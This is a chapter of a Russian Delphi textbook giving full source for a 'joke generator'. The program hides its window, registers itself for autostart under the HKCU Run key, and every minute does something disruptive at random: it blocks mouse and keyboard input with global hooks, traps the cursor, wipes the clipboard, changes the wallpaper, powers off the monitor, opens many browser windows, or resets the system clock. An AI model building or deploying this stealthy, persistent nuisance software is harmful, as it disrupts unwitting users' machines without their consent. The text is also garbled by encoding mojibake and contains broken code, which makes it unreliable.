Delphi. Учимся на примерах

Парижский Сергей Михайлович

Глава 14

Генератор шуток

 

 

Постановка задачи

Разработать программу, которая будет работать незаметно для пользователя и периодически выполнять выбранную случайным образом шуточную процедуру или функцию.

 

Разработка формы

Создайте новый проект Delphi. Для того чтобы выполнять периодические действия, нам понадобится компонент Timer категории System. Программа будет выполнять каждую минуту случайно выбранную шутку. Для того чтобы таймер срабатывал каждую минуту, необходимо присвоить свойству Interval значение 60000. Больше никаких свойств ни для формы, ни для таймера изменять не нужно.

 

Разработка программного кода

 

Первое, что нужно сделать для шуточной программы, — скрыть ее от глаз пользователя. Для этого достаточно создать обработчик события формы OnPaint и добавить в него следующий код:

procedure TForm1.FormPaint(Sender: TObject);

begin

 Form1 . Hide ; //прячем форму

end;

Здесь мы при каждой прорисовке формы скрываем ее из виду. При этом она не только будет скрыта визуально, но и исчезнет с панели задач, а также не будет отображаться на вкладке Приложения в диспетчере задач Windows.

Еще одно важное действие для нашей программы — реализация автозагрузки вместе с запуском ОС. Для этого создайте обработчик события главной формы OnCreate и добавьте в него следующий код:

procedure TForm1.FormCreate(Sender: TObject);

var

 reg:TRegistry; //переменная для работы с реестром

  path : string; //содержит путь к нашей программе

begin

 Randomize; //генератор случайных чисел

 //узнаем путь к программе и ее имя

В path:= Application.EXEname;

 reg := TRegistry.Create; //открываем реестр

 //ветка текущего пользователя

В reg.RootKey := HKEY_CURRENT_USER ;

 //открываем раздел автозагрузки

В if reg . OpenKey('\Software\Microsoft\Windows\' +

В  'CurrentVersion\Run', True)

В then begin

  //записываем ссылку на нашу программу в автозагрузку

В В reg.WriteString('Joker', path) ;

  reg.CloseKey; //закрываем реестр

  reg.Free; //освобождаем память

В  end;

end;

Чтобы это все работало, необходимо добавить в раздел uses ссылку на модуль Registry. Теперь все готово для создания программных шуток . Сначала объявим все глобальные переменные в разделе var:

var

В Form1: TForm1;

 //для отключения мыши и клавиатуры

В Dummy: integer = 0;

В OldKbHook: HHook = 0;

 //для снятия копии экрана

В Р’РњР 1: Graphics.TBitmap;

В DC1: HDC;

В Image1 : TImage ;

 // для поиска случайного рисунка

В fn : TSearchRec;

В Finds: integer;

В i : integer ;

В endval: integer;

 err_str : string; //вывод ошибки

 tm : TSystemTime ; //изменение времени

 reg: TRegistry; //для работы с реестром

 JokeNum: shortint ; //номер шутки, которую следует выполнить

 curs: TRect; //координаты прямоугольника

Все шутки будут описаны в обработчике события таймера OnTimer.

Добавьте в этот обработчик следующий код:

procedure TForm1.Timer1Timer(Sender: TObject);

begin

 JokeNum:= Random(10) + 1; //Выбираем случайный номер шутки

 case JokeNum of //выполняем шутку

В 1: begin

  //код первой шутки

В end;

В 2:

В begin

  //код второй шутки

В end;

В 3: begin

  //код третьей шутки

В end;

В 4: begin

  //код четвертой шутки

В end;

В 5: begin

  //код пятой шутки

В end;

В 6: begin

  //код шестой шутки

В end;

В 7: begin

  //код седьмой шутки

В end;

В 8: begin

  //код восьмой шутки

В end;

В 9: begin

  //код девятой шутки

В end;

В 10: begin

  //код десятой шутки

В end;

В end;

end;

Это шаблон для генератора шуток. Здесь выбирается случайное число от 1 до 10, которое будет определять, какую из шуток выполнить на этой минуте. Далее будут представлены фрагменты кода, выполняющие определенные действия, которые следует вставлять вместо комментария в соответствующую ветку конструкции case.

 

Шутка №1 — ограничение диапазона движения мыши

Итак, первая шутка заключается в наложении ограничения на диапазон движения мыши:

СЃurs:=В Rect(0, 0, Screen.Width div 2, Screen.Height);

ClipCursor(@curs);

После этого указатель мыши можно будет перемещать только в одной половине экрана.

 

Шутка №2 — отключение кнопок мыши

Вторая шутка будет более радикальной: используя перехваты функций, отключим кнопки мыши — ни левая, ни правая, ни средняя кнопка не будут выполнять никаких действий. Для этого напишите в разделе implementation следующую функцию:

function KbHook(code: Integer; wparam: Word; lparam: LongInt): LongInt; stdcall;

begin

В if code < 0 then

В  Result:= CallNextHookEx(oldKbHook, code, wparam, lparam)

В else

В  Result:= 1;

end;

После этого напишите код для второй шутки:

SystemParametersInfo(SPI_SETFASTTASKSWITCH, 1, @Dummy,0);

SystemParametersInfo(SPI_SCREENSAVERRUNNING, 1, @Dummy, 0);

OldKbHook:= SetWindowsHookEx(WH_mouse, @KbHook, HInstance, 0);

После этого ни одна из кнопок мыши функционировать не будет.

 

Шутка №3 — отключение клавиатуры

Используя функцию для отключения мыши, можно написать код для отключения клавиатуры. Напишите такой код для третьей шутки:

SystemParametersInfo(SPI_SETFASTTASKSWITCH, 1, @Dummy, 0);

SystemParametersInfo(SPI_SCREENSAVERRUNNING, 1, @Dummy, 0);

OldKbHook:= SetWindowsHookEx(WH_KEYBOARD, @KbHook, HInstance, 0);

Здесь вызывается та же функция, только вместо параметра WH_MOUSE ей передается WH_KEYBOARD. После этого клавиши на клавиатуре перестанут функционировать.

 

Шутка №4 — очистка буфера обмена

Четвертая шутка будет очищать буфер обмена и помещать туда собственный текст. Ее код:

ClipBoard.Open; //открываем буфер обмена

ClipBoard.Clear; //очищаем буфер обмена

//Помещаем в буфер обмена свой текст

Clipboard.asText:= 'Буфер обмена временно не работает!';

ClipBoard.Close; //закрываем буфер обмена

Для работы с буфером обмена необходимо добавить в раздел use ссылку на модуль clipbrd.

 

Шутка №5 — назначение фона для Рабочего стола

Пятая шутка будет делать копию экрана, сохранять этот рисунок, а затем назначать его в качестве фона для Рабочего стола. Вначале в разделе implementation напишем процедуру SetWallpaper, которая будет устанавливать фоновый рисунок:

procedure SetWallpaper(sWallpaperBMPPath: String; bTile: boolean);

begin

В reg:= TRegistry.Create;

В reg.RootKey:= hkey_current_user;

В if reg.OpenKey('Control Panel\Desktop', True) then

  reg.WriteString('Wallpaper', sWallpaperBMPPath); {ключ содержащий путь к bmp-файлу}

 //растянуть рисунок на весь экран

В reg.WriteString('TileWallpaper', '1');

В with reg do begin

В  WriteString('Wallpaper', sWallpaperBMPPath);

В  if bTile thenВ begin

В В  WriteString('TileWallpaper', '1');

В  end

В В else begin

В В  WriteString('TileWallpaper', '0');

В В end;

В end;

В reg.Free;

В SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, Nil, SPIF_SENDWININICHANGE);

end;

Информацию о фоновом рисунке Рабочего стола можно найти в реестре в ветке HKEY_CURRENT_USER по пути \Control Panel\Desktop. Параметр, содержащий название рисунка, называется wallpaper. То есть, для того чтобы сменить "обои" нам необходимо изменить значение параметра wallpaper и оповестить систему о том, что были внесены изменения в реестр. Последняя строка самая важная — она обновляет системные настройки.

Функция SystemParametersInfo имеет следующие параметры:

• действие, которое необходимо выполнить (в нашем случае SPI_SETDESKWALLPAPER — установка обоев);

• зависит от значения первого параметра;

• в нашем случае — путь к файлу с рисунком;

• в последнем параметре указывается, что необходимо сделать по сле выполнения всех действий. В данном случае мы должны обновить настройки системы — для этого выбираем SPIF_SENDWININICHANGE.

Код шутки в обработчике события таймера имеет следующий вид:

Р’РњР 1:= Graphics.TBitmap.Create;

//задаем размеры рисунка такие же, как размеры экрана

BMP1.Height:= Screen.Height;

BMP1.Width:= Screen.Width;

DC1:=GetDC(0);

//Делаем копию экрана

BitBlt(BMP1.Canvas.Handle, 0, 0, Screen.Width, Screen.Height, DC1, 0, 0, SRCCOPY);

Form1.Visible:= True; //восстанавливаем окно нашей программы

Image1:= TImage.Create(nil);

BMP1.IgnorePalette:= True;

Image1.Picture.Assign(BMP1);

BMP1.SaveToFile('с:\1.bmp'); //сохраняем снимок в файл 1.bmp

SetWallpaper('с:\1.bmp', False); //назначаем снимок, как фон

Repaint; //обновляем

Здесь мы делаем копию экрана, сохраняем ее в файл и, вызывая процедуру SetWallPaper, назначаем в качестве фона Рабочего стола.

 

Шутка №6 — выбор фона случайным образом

Раз уж мы написали процедуру, которая устанавливает фоновый рисунок, почему бы не использовать ее в нашей следующей шутке?

Шестая шутка будет заключаться в том, чтобы выбрать случайным образом рисунок из каталога Windows и сделать его фоновым:

endval:= Random(10) + 5; //для случайности выбора рисунка

//ищем все файлы с расширением *.bmp в каталоге Windows

Finds:= FindFirst('РЎ:\Windows\*.bmp', faAnyFile, fn);

Finds:= Random(2) ; //случайное число, 0 или 1

//если выпала 1, то устанавливаем первый попавшийся рисунок

if Finds = 1 then SetWallpaper(fn.Name, False);

if Finds = 0 then begin //иначе…

В for i:=1 to endval do begin

  Finds:= FindNext(fn); // …ищем другие рисунки

  //выбираем любой другой рисунок и делаем его фоновым

  if i = endval – 3 then SetWallpaper(fn.Name, False);

В end;

end;

FindClose(fn); //завершаем поиск

Здесь мы перебираем все рисунки в каталоге Windows и случайным образом выбираем один из них в качестве фонового. Затем мы устанавливаем фон с помощью ранее созданной процедуры SetWallpaper.

 

Шутка №7 — выключение монитора

Седьмая шутка будет выключать монитор. Для этого достаточно написать одну строку кода:

SendMessage(Application.Handle, WM_SYSCOMMAND, SC_MONITORPOWER, 1);

 

Шутка №8 — сообщение об ошибке, содержащее "мусор"

Восьмая шутка будет выводить сообщение об ошибке, но не простое, а содержащее огромное количество случайных чисел. Код этой шутки:

for i:=1 to 200 do begin

В case i of

 //после каждого 25-го числа – перенос на новую строку

В  25,50,75,100,125,150,175,199: err_str:= err_str + #13#10;

В end;

 //текст "ошибки"

В err_str:= err_str + IntToStr(Random(99999));

end;

MessageDlg(errstr, mtError, [mbOk], 0); //выводим сообщение

В цикле от 1 до 200 выбирается случайное число от 0 до 99999. Все числа преобразовываются к символьному виду и добавляются к строковой переменной errstr. На каждом 25-м числе происходит перенос строки. В результате выдается примерно такое сообщение об "ошибке" как на рис. 14.1.

Рис. 14.1. Сообщение об "ошибке"

 

Шутка №9 — открытие браузера Internet Explorer

В девятой шутке мы будем открывать несколько (от 5 до 15) окон браузера Internet Explorer с попыткой зайти на сайт www.heel.nm.ru.

Код этой шутки:

for i:=1 to Random(10)+ 5 do //случайное число от 5 до 15.

В ShellExecute(0, 'open', 'C:\Program Files\lnternet Explorer\' +

В  'IEXPLORE.EXE', 'www.heel.nm.ru', 0, SW_MAXIMIZE);

Чтобы использовать функцию ShellExecute, необходимо добавить в раздел uses ссылку на модуль ShellApi.

 

Шутка №10 — сброс системной даты/времени

Последняя, десятая шутка будет устанавливать текущую дату 01.01.2000, и изменять текущее время на 00:00:01. Код этой шутки:

GetLocalTime(tm); //узнаем текущую дату и время

tm.wYear:= 2000; //устанавливаем год

tm.wMonth:= 01; //месяц

tm.wDay:= 01; //день

tm.wHour:= 0; //часы

tm.wMinute:= 0; //минуты

tm.wSecond := 1; //секунды

tm.wMilliseconds := 0; //РјСЃ

SetLocalTime(tm); //устанавливаем новую дату и время

 

Полный исходный код модуля

Полный код программного модуля генератора шуток представлен в листинге 14.1.

Листинг 14.1. Программный модуль генератора шуток

unit Unit1;

interface

uses

В Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, ExtCtrls, Registry, clipbrd, ShellApi;

type

В TForm1 = class(TForm)

В Timer1: TTimer;

В procedure Timer1Timer(Sender: TObject);

В procedure FormPaint(Sender: TObject);

В procedure FormCreate(Sender: TObject);

private

В { Private declarations }

public

В { Public declarations }

end;

var

В Form1: TForm1;

 //для отключения мыши и клавиатуры

В Dummy: integer = 0;

В OldKbHook: HHook = 0;

 //для снятия копии экрана

В Р’РњР 1: Graphics.TBitmap;

В DC1: HDC;

В Image1: TImage;

 // для поиска случайного рисунка

В fn: TSearchRec;

В Finds: integer;

В i: integer;

В endval: integer;

 err_str: string;//вывод ошибки

 tm: TSystemTime; //изменение времени

 reg: TRegistry; //для работы с реестром

 JokeNum: shortint; //номер шутки, которую следует выполнить

 curs: TRect; //координаты прямоугольника

implementation

procedure SetWallpaper(sWallpaperBMPPath: String; bTile: boolean);

begin

В reg:= TRegistry.Create;

В reg.RootKey:= hkey_current_user;

В if reg.OpenKey('Control Panel\Desktop', True) then

  reg.WriteString('Wallpaper', sWallpaperBMPPath); {ключ содержащий путь к bmp-файлу}

 //растянуть рисунок на весь экран

В reg.WriteString('TileWallpaper', '1');

В with reg do begin

В  WriteString('Wallpaper', sWallpaperBMPPath);

В  if bTile thenВ begin

В В  WriteString('TileWallpaper', '1');

В  end

В В else begin

В В  WriteString('TileWallpaper', '0');

В В end;

В end;

В reg.Free;

В SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, Nil, SPIF_SENDWININICHANGE);

end ;

function KbHook(code: Integer; wparam: Word; lparam: LongInt): LongInt; stdcall;

begin

В if code < 0 then

В  Result:= CallNextHookEx(oldKbHook, code, wparam, lparam)

В else

В  Result:= 1;

end;

{$R *.dfm}

procedure TForm1.Timer1Timer(Sender: TObject);

var

В JokeNum: shortint;

В curs: TRect;

begin

В JokeNum:= Random(10) + 1;

В case JokeNum of

  1: begin //Уменьшить диапазон движения мыши

В  В curs := Rect(0, 0, Screen.Width div 2,Screen.Height);

В  В ClipCursor(Scurs);

В  end;

  2: begin //Отключить мышь

В  SystemParametersInfo(SPI_SETFASTTASKSWITCH, 1, @Dummy,0);

В  SystemParametersInfo(SPI_SCREENSAVERRUNNING, 1, @Dummy, 0);

В  OldKbHook:= SetWindowsHookEx(WH_mouse, @KbHook, HInstance, 0);

В  end;

  3: begin //отключить клавиатуру

В В  SystemParametersInfo(SPI_SETFASTTASKSWITCH, 1, @Dummy, 0);

В В В SystemParametersInfo(SPI_SCREENSAVERRUNNING, 1, @Dummy, 0);

В В В OldKbHook:= SetWindowsHookEx(WH_KEYBOARD, @KbHook, HInstance, 0);

В  end;

  4: begin //Очистить буфер обмена

   ClipBoard.Open;//открываем буфер обмена

   ClipBoard.Clear;//очищаем буфер обмена

   //Помещаем в буфер обмена свой текст

   Clipboard.asText:= 'Буфер обмена временно не работает!';

   ClipBoard.Close; //закрываем буфер обмена

В В end;

  5: begin // сделать копию экрана и назначить её фоном

В В  Р’РњР 1:= Graphics.TBitmap.Create;

   //задаем размеры рисунка такие же,как размеры экрана

В В  BMP1.Height:= Screen.Height;

В В  BMP1.Width:= Screen.Width;

В В  DC1:=GetDC(0);

   //Делаем копию экрана

В В  BitBlt(BMP1.Canvas.Handle, 0, 0, Screen.Width, Screen.Height, DC1, 0, 0, SRCCOPY);

   Form1.Visible:= True;//восстанавливаем окно нашей программы

В В  Image1:= TImage.Create(nil);

В В  BMP1.IgnorePalette:= True;

В В  Image1.Picture.Assign(BMP1);

   BMP1.SaveToFile('с:\1.bmp'); //сохраняем снимок в файл 1.bmp

   SetWallpaper('с:\1.bmp', False); //назначаем снимок, как фон

   Repaint; //обновляем

В В end;

  6: begin // Найти случайный рисунок и сделать его фоновым

   endval:= Random(10) + 5; //для случайности выбора рисунка

   //ищем все файлы с расширением *.bmp в каталоге Windows

В В  Finds:= FindFirst('РЎ:\Windows\*.bmp', faAnyFile, fn);

   Finds:= Random(2); //случайное число, 0 или 1

   //если выпала 1, то устанавливаем первый попавшийся рисунок

В В  if Finds = 1 then SetWallpaper(fn.Name, False);

   if Finds = 0 then begin //иначе…

В В  В for i:=1 to endval do begin

     Finds:= FindNext(fn); // …ищем другие рисунки

     //выбираем любой другой рисунок и делаем его фоновым

     if i = endval – 3 then SetWallpaper(fn.Name, False);

В В  В end;

В В  end;

   FindClose(fn); //завершаем поиск

В В end;

  7: begin //Выключить монитор

В В  SendMessage(Application.Handle, WM_SYSCOMMAND, SC_MONITORPOWER, 1);

В В end;

  8: begin //Сообщение об "ошибке"

В В  for i:=1 to 200 do begin

В В В  case i of

    //после каждого 25-го числа – перенос на новую строку

В В  В 25,50,75,100,125,150,175,199: err_str:= err_str + #13#10;

В В  В end;

    //текст "ошибки"

В В  В err_str:= err_str + IntToStr(Random(99999));

В В  end;

   MessageDlg(errstr, mtError, [mbOk], 0); //выводим сообщение

В В end;

  9: begin //Запуск Internet Explorer

   for i:=1 to Random(10)+ 5 do //случайное число от 5 до 15.

В В  В ShellExecute(0, 'open', 'C:\Program Files\lnternet Explorer\' +

В В  В  'IEXPLORE.EXE', 'www.heel.nm.ru', 0, SW_MAXIMIZE);

В В end;

 10: begin //Перевести время

   GetLocalTime(tm); //узнаем текущую дату и время

   tm.wYear:= 2000; //устанавливаем год

   tm.wMonth:= 01; //месяц

   tm.wDay:= 01; //день

   tm.wHour:= 0; //часы

   tm.wMinute:= 0; //минуты

   tm.wSecond := 1; //секунды

В В  tm.wMilliseconds := 0; //РјСЃ

   SetLocalTime(tm); //устанавливаем новую дату и время

В В end;

В end;

end;

procedure TForm1.FormPaint(Sender: TObject);

begin

 Form1.Hide; //прячем форму

end;

procedure TForm1.FormCreate(Sender: TObject);

var

 reg:TRegistry;//переменная для работы с реестром

 path: string;//содержит путь к нашей программе

begin

 Randomize; //генератор случайных чисел

 //узнаем путь к программе и ее имя

В path:= Application.EXEname;

 reg:= TRegistry.Create;//открываем реестр

 //ветка текущего пользователя

В reg.RootKey:= HKEY_CURRENT_USER;

 //открываем раздел автозагрузки

В if reg.OpenKey('\Software\Microsoft\Windows\' +

В  'CurrentVersion\Run', True)

В then begin

  //записываем ссылку на нашу программу в автозагрузку

В В reg.WriteString('Joker', path);

  reg.CloseKey;//закрываем реестр

  reg.Free;//освобождаем память

В end;

end;

end.

⊚ Р’СЃРµ файлы проекта Рё исполняемый файл рассмотренной программы находятся РЅР° прилагаемом Рє РєРЅРёРіРµ компакт-РґРёСЃРєРµ РІ папке Chapter_14.